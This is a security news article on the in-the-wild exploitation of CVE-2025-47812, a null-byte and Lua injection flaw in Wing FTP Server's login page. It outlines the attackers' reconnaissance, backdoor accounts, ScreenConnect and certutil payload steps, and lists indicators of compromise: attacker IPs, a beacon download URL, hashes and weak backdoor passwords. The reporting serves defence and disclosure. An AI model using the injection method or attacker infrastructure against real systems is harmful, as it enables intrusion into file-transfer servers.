Wing FTP Server RCE Vulnerability Actively Exploited in the Wild

Security researchers at Huntress have confirmed active exploitation of a critical remote code execution vulnerability in Wing FTP Server, designated CVE-2025-47812, occurring just one day after its public disclosure.

This rapid weaponization of the vulnerability demonstrates the urgent need for organizations to update their systems immediately to prevent potential compromise.

Zero-Day Window Exploitation

The vulnerability, first publicly disclosed on June 30, 2025, by security researcher Julien Ahrens, affects all versions of Wing FTP Server prior to 7.4.4.

Huntress security teams detected the first exploitation attempt on July 1, 2025, at 16:15 UTC, marking an extremely short window between disclosure and active attacks.

This timeline underscores the sophisticated nature of modern threat actors who can quickly develop and deploy exploits for newly disclosed vulnerabilities.

CVE-2025-47812 is classified as a null byte and Lua injection flaw that enables attackers to achieve root or SYSTEM-level remote code execution.

The vulnerability stems from improper handling of null bytes in the username parameter, specifically within the loginok.html file that manages the authentication process.

This flaw allows remote attackers to inject malicious Lua code after inserting a null byte in the username field, effectively bypassing security controls and executing arbitrary commands on the target system.

Wing FTP Server, a popular file transfer protocol software supporting Windows, Linux, and macOS platforms, serves as a critical component in many organizations’ file sharing infrastructure.

The widespread deployment of this software makes the vulnerability particularly concerning for enterprise environments where file transfer services are essential for business operations.

Sophisticated Attack Chain

The exploitation observed by Huntress researchers demonstrates a multi-stage attack methodology that reveals both the sophistication of the threat actors and some operational security mistakes.

The attack begins with a specially crafted POST request to the loginok.html endpoint, where attackers use either known credentials or anonymous accounts to establish a session.

The malicious payload includes a null byte (%00) to break string processing, followed by carefully constructed Lua code designed to execute system commands.

Analysis of the compromised system revealed that multiple threat actors attempted to exploit the vulnerability throughout the day, with at least five different IP addresses involved in the attacks.

The threat actors employed various techniques and demonstrated varying levels of competency:

• Reconnaissance Activities: Executed system information gathering commands, including ipconfig, whoami, arp -a, and nslookup to map the target environment.
• Persistence Attempts: Created new user accounts with usernames “wingftp” and “wing,” using weak passwords that follow predictable patterns like “123123qweqwe.”
• Remote Access Tool Deployment: Attempted to install ScreenConnect remote management software to maintain persistent access to the compromised system.
• Malware Distribution: Tried to download and execute malicious payloads using certutil commands, demonstrating familiarity with living-off-the-land techniques.
• Operational Errors: Made several technical mistakes, including malformed commands and typos that hindered their attack progression and revealed their varying skill levels.

Indicators of Compromise (IOCs):

Item	Description
223.160.131[.]104	1st Attacker IP
149.248.44[.]88	2nd Attacker IP
103.88.141[.]42	3rd Attacker IP
185.196.9[.]225	4th (Bumbling) Attacker IP
146.70.11[.]39	5th Attacker IP
https://webhook[.]site/5d112487-6133-4942-ac87-3f473d44bd81	Webhook site
123123qweqwe	Password used for attacker accounts
123123qweqweq	Password used for one attacker account
wing	Backdoor username created by attacker
wingftp	Backdoor username created by attacker
http://185.196.9[.]225:8080/EOp45eWLSp5G5Uwp_yOCiQ %TEMP%\mvveiWJHx.exe	Beacon URL
%TEMP%mvveiWJHx.exe	Beacon file path
c637ec00bd22da4539ec6def89cd9f7196a303d17632b1131a89d65e4f5698f4	Beacon SHA256
Trojan:Win32/Ceprolad.A	Microsoft Defender detection
https://oooooooo11.screenconnect[.]com/bin/screenconnect.clientsetup.msi	ScreenConnect installer URL
c:1.msi	ScreenConnect installer path
f0fcc638cd93bdd6fb4745d75b491395a7a1b2cb08e0153a2eb417cb2f58d8ac	ScreenConnect installer SHA256
instance-y9tbyl-relay.screenconnect[.]com	ScreenConnect callback URL

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant updates

The post Wing FTP Server RCE Vulnerability Actively Exploited in the Wild appeared first on Cyber Security News.